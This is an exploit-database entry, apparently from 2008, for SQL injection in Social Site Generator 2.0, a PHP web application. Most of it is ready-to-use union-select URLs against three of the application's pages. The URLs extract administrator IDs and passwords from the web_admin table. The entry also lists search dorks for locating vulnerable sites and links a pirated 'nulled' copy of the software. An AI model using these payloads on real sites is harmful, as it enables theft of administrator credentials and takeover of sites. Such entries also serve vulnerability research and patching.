Social Site Generator 2.0 - 'sgc_id' SQL Injection

Author: DeAr Ev!L
type: webapps
platform: php
port: 
date_added: 2008-05-30 
date_updated: 2016-12-01 
verified: 1 
codes: OSVDB-45865;CVE-2008-6421;OSVDB-45864;OSVDB-45863;CVE-2008-6420;OSVDB-45862;OSVDB-45861;OSVDB-45860;CVE-2008-6419;OSVDB-45859 
tags: 
aliases:  
screenshot_url:  
application_url: 

< -------------------\__________________/------------------- >

#
#
# Application Name        : Social Site Generator
#
# DeMo                        : www.ssgdemo.com
#
#Download                   : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type         : SQL InJeCtiOn
#
# Dork 1                       : display_blog.php
# Dork 2                       : social_my_profile_download
# Dork 3                       : social_forum_subcategories
#
# author                       : DeAr Ev!L
#
#
# Greatz                      : ALLAH
#                                : Genie & Roy5 & Mister-x
#
# Team                       : DeLtA MoRoCcAn tEaM
#
#Site Web                   : WwW.BHJA.NeT
#
< -------------------^_________________^------------------- >



< -- bug SQL start -- >

ADMIN :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,admin_id+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+admin_id,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,admin_id+from+web_admin

Password :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,password+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+password,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,password+from+web_admin

< -- bug SQL End -- >

# milw0rm.com [2008-05-31]